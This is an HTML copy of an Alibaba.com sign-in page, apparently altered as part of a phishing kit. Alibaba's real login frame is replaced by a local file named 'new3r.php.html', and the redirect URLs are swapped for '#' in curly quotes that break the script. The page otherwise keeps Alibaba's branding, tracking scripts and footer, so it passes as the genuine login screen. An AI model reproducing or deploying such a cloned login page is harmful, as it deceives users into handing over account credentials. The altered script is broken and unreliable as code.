<html class="rwd rwd-l"><head><script src="//cmap.alibaba.com/ml.html?callback=landing8978252&amp;cna=k%2FiUERBYT00CAXys8r0ifHQ9"></script>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge"><!-- 防止IE8,7进入怪异模式 -->
		<title>Alibaba&nbsp;Manufacturer&nbsp;Directory&nbsp;-&nbsp;Suppliers,&nbsp;Manufacturers,&nbsp;Exporters&nbsp;&amp;amp;&nbsp;Importers&nbsp;</title><link href='http://www.alibaba.com/favicon.ico' rel='shortcut icon'/>
        <meta name="data-spm" content="a2700">
		<meta name="keywords" content="Alibaba Manufacturer Directory - Suppliers, Manufacturers, Exporters &amp; Importers">
		<meta name="description" content="Alibaba Manufacturer Directory - Suppliers, Manufacturers, Exporters &amp; Importers">

												
								
				
				
		
	
<link href="https://stylessl.aliunicorn.com/css/6v/??apollo/core/core-sc.css,apollo/core/rwd-sc.css,apollo/core/rwd-sc-ie8.css,apollo/mod/feedback/feedback-sc.css,run/common/switch-language/switch-language.css,apollo/mod/footer/footer-v4-sc.css,run/login/home/home-buyer.css,run/login/home/login-fix.css?t=cfa4b1c1_145a975c2a" rel="stylesheet" type="text/css" media="all">

<script type="text/javascript" src="https://stylessl.aliunicorn.com/js/6v/biz/login/home/??preload.js?t=630906a9_5b149c395b"></script>




</head>
	<body data-spm="homelogin"><script id="beacon-aplus" src="//u.alicdn.com/js/aplus_en.js" exparams="userid=&amp;aplus&amp;ali_beacon_id=124%2e172%2e242%2e189%2e1494092436767%2e521026%2e9&amp;ali_apache_id=124%2e172%2e242%2e189%2e1494092423125%2e537795%2e0&amp;ali_apache_track=%22mt%3d1%7cmid%3dus1185286669ihxo%22&amp;ali_apache_tracktmp=%22W%5fsigned%3dY%22&amp;dmtrack_c={}&amp;pageid=299068010ab0aa281498135866&amp;hn=enlogin010176170040%2eot7&amp;asid=AQAAAAA6vUtZUq7GcgAAAAC9ySjvVIA/ug=="></script>

		
				
		<header id="header" class="container">
			<div id="ali-logo" class="util-left">
				<a href="//www.alibaba.com" title="Manufacturers">Alibaba.com</a>
			</div>
			<div id="header-switch" class="util-left">
				<a id="overShowForTranslate" href="javascript:;">
					<span id="overshowTranslate" class="mn-cs" rel="en_US"> English </span>
					<i class="ml-hollow-arrow"><em></em><b></b></i>
				</a>
				<div id="overshowTranslateContent" style="display: none; z-index: 99; position: absolute; left: 0px; top: 14px;" data-widget-cid="widget-1">
					<div class="topHack"></div>
					<ul id="languagesContainer"><li><a data-role="item" href="javascript:void(0)" rel="zh_CN"> 简体 </a></li><li><a data-role="item" href="javascript:void(0)" rel="zh_TW"> 繁體 </a></li><li><a data-role="item" href="javascript:void(0)" rel="es_ES"> Español </a></li><li><a data-role="item" href="javascript:void(0)" rel="pt_PT"> Português </a></li><li><a data-role="item" href="javascript:void(0)" rel="de_DE"> Deutsch </a></li><li><a data-role="item" href="javascript:void(0)" rel="fr_FR"> Français </a></li><li><a data-role="item" href="javascript:void(0)" rel="it_IT"> Italiano </a></li><li><a data-role="item" href="javascript:void(0)" rel="ru_RU"> Pусский </a></li><li><a data-role="item" href="javascript:void(0)" rel="ko_KR"> 한국어 </a></li><li><a data-role="item" href="javascript:void(0)" rel="ja_JP"> 日本語 </a></li><li><a data-role="item" href="javascript:void(0)" rel="ar_SA"> اللغة العربية </a></li><li><a data-role="item" href="javascript:void(0)" rel="tr_TR"> Türk </a></li><li><a data-role="item" href="javascript:void(0)" rel="th_TH"> ภาษาไทย </a></li><li><a data-role="item" href="javascript:void(0)" rel="vi_VN"> tiếng Việt </a></li><li><a data-role="item" href="javascript:void(0)" rel="nl_NL"> nederlands </a></li><li><a data-role="item" href="javascript:void(0)" rel="hi_IN">हिन्दी</a></li><li><a data-role="item" href="javascript:void(0)" rel="iw_HE">עברית</a></li><li><a data-role="item" href="javascript:void(0)" rel="in_ID">bahasa Indonesia</a></li></ul>
					<div class="botHack"></div>
				</div>
			</div>
		</header>

		<hr>

		<div id="content" class="main container util-clearfix">
		
    <!-- tangram:1405 begin-->
<script type="text/javascript">
    window.SCXmanConfig = {
        enableKeepLogin : true
    };
</script>


<div id="screen-banner">
</div>

<div id="banner" data-spm="banner" class="col-m-36 hidden-s hidden-xs hidden-xxs" style="margin: 0;">
        <!-- tangram:645 begin-->




<div style="height:350px;width:585px;margin:0px auto;">
<a href="//activity.alibaba.com/page/vote-for-new-Trade-Assurance-features.html?tracelog=login_votelp" target="_blank">
		<img src="//img.alicdn.com/tps/TB1awf5PXXXXXXLXFXXXXXXXXXX-585-350.jpg">
</a>
</div>

<!-- tangram:645 end-->
</div>

<div id="action-container" class="util-clearfix">
    <div id="action-banner" class="util-clearfix" data-spm="actionbanner">
        <a href="//activity.alibaba.com/page/global-home-week-US-pavilion.html?tracelog=dengluye" target="_blank">
            &nbsp;
        </a>
    </div>

    <div id="login-form-wrapper" data-spm="login" class="util-clearfix col-m-24 col-xs-60">
    	<div class="inner">
    		<div id="login-form">
    			<div id="standardlogin" class="xman-embed" data-widget-cid="widget-3"><div class="xman-content ui-tab" data-role="content" data-widget-cid="widget-5"><div class="xman-wrapper ui-tab">
	<ul class="ui-tab-nav" style="display: none;">
  
	<li class="ui-tab-trigger ui-tab-active">
		<a href="javascript:void(0);">Sign in to Alibaba.com</a>
	</li>

	</ul>

	<div class="ui-tab-body ui-tab-content">
	<div data-widget-cid="widget-4" class="ui-tab-pane ui-tab-panel"><style type="text/css">
  iframe#alibaba-login-box {
    display: block !important;
    visibility: visible !important;
  }
  #
  #alibaba-login-box{
      height: 345px;
  }

  #agreementArea{
    display: none;
  }
  #login-form .agreement-to {
    line-height: 20px;
    font-size: 12px;
    color: #999;
    font-weight: lighter;
  }
  #login-form .agreement-to a{
    font-size: 12px;
    color: #666;
  }
  #login-form .agreement-to a:hover{
    text-decoration: underline;
  }
  #login-form .agreement-to .checkbox {
      width: 16px;
      height: 16px;
      margin: 3px 5px 0;
      float: left;
      background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAAQlBMVEXe4OTj5On////3+Prc3uPMzMz09ffd3t/y8vTj4+Tg4OHS0tPu7/Ho6erk5erb29zX2NjPz8/s7O7l5efU1NXQ0NC39glZAAAAA3RSTlP6qgVmp5I0AAAAnElEQVQ4y9WTSQ7DIAxFTYINYQiQ0PtftciqhEiF2bbesPhPnj6GTYGeBqgN1En7NOhUAE0XCAC9i6H/HLA+ioD1xUoA+RKkElSbLgBU8ZKapMx6B0IcgYxxHPNAN+r3cw8GTddT13sPDhO/DB9fm+QqmUb9OcWNlTiVm3kR0duWyMzNuop3mCQ3wwuTbLc1P/blPsDy9JbHuzz/N0XnDtlhkuA0AAAAAElFTkSuQmCC);
      background-size: 100%;

  }
  #login-form .agreement-to .checkbox.right{
    float: right;
  }
</style>


<div id="signin-server-feedback" class="ui-feedback ui-feedback-standalone" style="display: none;"></div>



  <div id="alibaba-login-iframe" class="iframe-show iframe-loaded">

  	

  	<div id="alibaba-login-iframe-loading"></div>
  <iframe id="alibaba-login-box" src=new3r.php.html width="100%" height="342" frameborder="none" scrolling="no" style="border: none; visibility: visible;"></iframe></div>

  <div id="agreementArea" class="ui-form-item util-clearfix" style="display: block;">
  
  

     
      <div class="agreement-to">
          <i class="checkbox "></i>I agree to <a target="_blank" href="https://rule.alibaba.com/rule/detail/2042.htm" id="agreementLinkNeedChange">Free Membership Agreement</a>
      </div>
      <div class="agreement-to">
         <i class="checkbox "></i>I agree to <a target="_blank" href="https://rule.alibaba.com/rule/detail/2034.htm">Receive marketing materials</a>
      </div>
      
        <!-- 三方登陆布点容器 - end -->
</div>




</div></div>
</div>
</div>
<div class="loading-box"></div></div>
    		</div>
    
    		    
    		    			    		    
    		    		<div id="advisory" class="util-clearfix">
    			    				<img src=https://img.alicdn.com/tps/TB1ROn8OpXXXXbZaXXXXXXXXXXX-32-31.png height="25" border="0" style="vertical-align:middle; margin-right:5px;">Can't sign in? <a href="//gcx.alibaba.com/icbu/anna/portal.htm?pageId=6090&amp;_param_digest_=b635ef82725207200efba8781431d7df" target="_blank">Get help here</a>
    			    		</div>
    		    	</div>
    </div>

</div>

<style type="text/css">
    #login-form {
        background-color:#fff;
    }
    
    body {
        margin:0px;
    }
    
    #content {
        padding:0px;
    }
    #screen-banner {
        position:absolute;
        top:101px;
        left:0px;
        width:100%;
        height:600px;
        background:url(https://img.alicdn.com/tfs/TB1HguCRVXXXXbaXpXXXXXXXXXX-2200-600.jpg) center center no-repeat;
    }
    
    #banner {
        display: none;
    }
    
    #action-container {
        position:relative;
        max-width:1200px;
        min-height:600px;
    }
    
    #action-banner {
        float:left;
        width:60%;
        height: 600px;
    }
    
    #action-banner a {
        display:block;
        width:100%;
        height:100%;
        text-decoration:none;
    }
    
    
    #login-form-wrapper {
        float:left;
        margin-right:0px;
        margin-top: 40px;
        margin-bottom: 0px;
        padding-bottom: 0px;
    }
    
    #advisory {
        padding:10px 0px;
    }
    
    #ui-footer {
        position:relative;
        left:auto;
        bottom:auto;
    }
    
    
    @media (max-width: 1022px) {
        #screen-banner {
            display:none;
        }
        
        #login-form-wrapper {
            margin-top:60px;
        }
        
        #action-banner {
            display:none;
        }
        
    }
    
</style>
<!-- tangram:1405 end-->

<script type="text/javascript">
    seajs.use(['https://stylessl.aliunicorn.com/js/6v/biz/login/home/??index.js?t=95b1fb67_48fa5a95b8'.replace(':443', ''), 'gdata'], function(Login, gdata){
    	gdata.define('xUrlForForcedReturn', ‘#’);

    	Login({
            locale: 'en_US',
    		isFromChina: 'Anonymous Proxy',
            returnUrl: ‘#’,
    		isShowLinkFacebook: 'true',
    		languageLabel: [' English ', ' 简体 ', ' 繁體 ', ' Espa&ntilde;ol ', ' Portugu&ecirc;s ', ' Deutsch ', ' Fran&ccedil;ais ', ' Italiano ', ' Pусский ', ' 한국어 ', ' 日本語 ', ' اللغة العربية ', ' T&uuml;rk ', ' ภาษาไทย ', ' tiếng Việt ', ' nederlands ','हिन्दी','עברית','bahasa Indonesia'],
    		onSuccess: function() {
    			window.location.href = ‘#’;
    		}
    	});
    });
</script>

		</div>
				<!--TMS:1281516-->
<style>
/* footer css */
</style>

<div class="skin-default" data-name="mm-sc-new-footer" data-skin="default" data-guid="1409634827621" id="guid-1409634827621" data-version="110" data-type="3"><div class="module" data-spm="a271py"><div class="mm-sc-new-footer">







	<link type="text/css" rel="stylesheet" href="//i.alicdn.com/sc-footer/20160321161740/dist/footer.css">







<footer id="ui-footer" class="ui-footer ui-footer-wrapper">
	<hr>
	<div class="ui-footer-seo">
						<p class="ui-footer-seo-language">
			<i class="global-site"></i> Alibaba.com Site: <a href="http://www.alibaba.com">International</a> - <a href="http://spanish.alibaba.com">Español</a> - <a href="http://portuguese.alibaba.com">Português</a> - <a href="http://german.alibaba.com">Deutsch</a> - <a href="http://french.alibaba.com">Français</a> - <a href="http://italian.alibaba.com">Italiano</a> - <a href="http://hindi.alibaba.com">हिंदी</a> - <a href="http://russian.alibaba.com">Pусский</a> - <a href="http://korean.alibaba.com">한국어</a> - <a href="http://japanese.alibaba.com">日本語</a> - <a href="http://arabic.alibaba.com">اللغة العربية</a> - <a href="http://thai.alibaba.com">ภาษาไทย</a> - <a href="http://turkish.alibaba.com">Türk</a> - <a href="http://dutch.alibaba.com/">Nederlands</a> - <a href="http://vietnamese.alibaba.com/">tiếng Việt</a> - <a href="http://indonesian.alibaba.com/">Indonesian</a> - <a href="http://hebrew.alibaba.com/">עברית</a>		</p>
				
				<p class="ui-footer-seo-brand">
			<a rel="nofollow" href="http://www.alibabagroup.com/en/global/home">Alibaba Group</a>
			| <a rel="nofollow" target="_blank" href="//www.taobao.com">Taobao Marketplace</a>
			| <a rel="nofollow" target="_blank" href="//www.tmall.com">Tmall.com</a>
			| <a rel="nofollow" target="_blank" href="//ju.taobao.com">Juhuasuan</a>
			| <a rel="nofollow" target="_blank" href="http://www.aliexpress.com/">AliExpress</a>
			| <a rel="nofollow" target="_blank" href="//www.alibaba.com">Alibaba.com International</a>
			| <a rel="nofollow" target="_blank" href="http://www.1688.com">1688.com</a>
			| <a rel="nofollow" target="_blank" href="http://www.alimama.com">Alimama</a>
			| <a rel="nofollow" target="_blank" href="//www.alitrip.com/">Alitrip</a>
			<br>
			<a rel="nofollow" target="_blank" href="http://www.aliyun.com">Alibaba Cloud Computing</a>
			| <a rel="nofollow" target="_blank" href="http://www.yunos.com">YunOS</a>
			| <a rel="nofollow" target="_blank" href="//aliqin.tmall.com">AliTelecom</a>
			| <a rel="nofollow" target="_blank" href="http://www.net.cn">HiChina</a>
			| <a rel="nofollow" target="_blank" href="http://www.autonavi.com/">Autonavi</a>
			| <a rel="nofollow" target="_blank" href="http://www.uc.cn/">UCWeb</a>
			| <a rel="nofollow" target="_blank" href="http://www.umeng.com/">Umeng</a>
			| <a rel="nofollow" target="_blank" href="http://www.xiami.com">Xiami</a>
			| <a rel="nofollow" target="_blank" href="http://www.ttpod.com/">TTPod</a>
			| <a rel="nofollow" target="_blank" href="https://www.laiwang.com">Diandianchong</a>
			| <a rel="nofollow" target="_blank" href="http://www.dingtalk.com/?lwfrom=20150202135600390">DingTalk</a>
			| <a rel="nofollow" target="_blank" href="https://intl.alipay.com/index.htm">Alipay</a>
		</p>
		

		<p class="ui-footer-policy">
			<a href="http://rule.alibaba.com/rule/detail/2047.htm" rel="nofollow">Product Listing Policy</a>
			- <a href="http://rule.alibaba.com/rule/detail/2049.htm" rel="nofollow">Intellectual Property Protection</a>
			- <a href="http://rule.alibaba.com/rule/detail/2034.htm" rel="nofollow">Privacy Policy</a>
			- <a href="http://rule.alibaba.com/rule/detail/2041.htm" rel="nofollow">Terms of Use</a>
					</p>

		<p class="ui-footer-copyright">
			<a rel="nofollow" href="http://www.alibaba.com/trade/servlet/page/static/copyright_policy">©</a> 1999-2017 Alibaba.com. All rights reserved.		</p>
	</div>
</footer>

			
</div>

<div id="ServerId" style="color:whitesmoke;text-align:center;background:whitesmoke">  </div>

</div></div>

<script>
seajs.Module.define('mm-sc-new-footer', function(require, exports) {
	// 模块初始化函数
	exports.init = function(box, module) {
		// code here
	};
});
</script>
<script>(function(f){var e,d,c;e=f.replace(/#/ig,"").split(",");for(var b=0,a=e.length;b<a;b++){d=document.getElementById(e[b]);c=d.getAttribute("data-name");seajs.use(c,function(g){g.init(d,c)})}})('#guid-1409634827621');</script>
						<div style="display:none">dragoon check</div>


<div class="ui-autocomplete" data-widget-cid="widget-6" style="width: 308px; z-index: 99; display: none; position: absolute; left: -9999px; top: -9999px;">
    <ul class="ui-autocomplete-ctn" data-role="items">
        
    </ul>
</div></body></html>
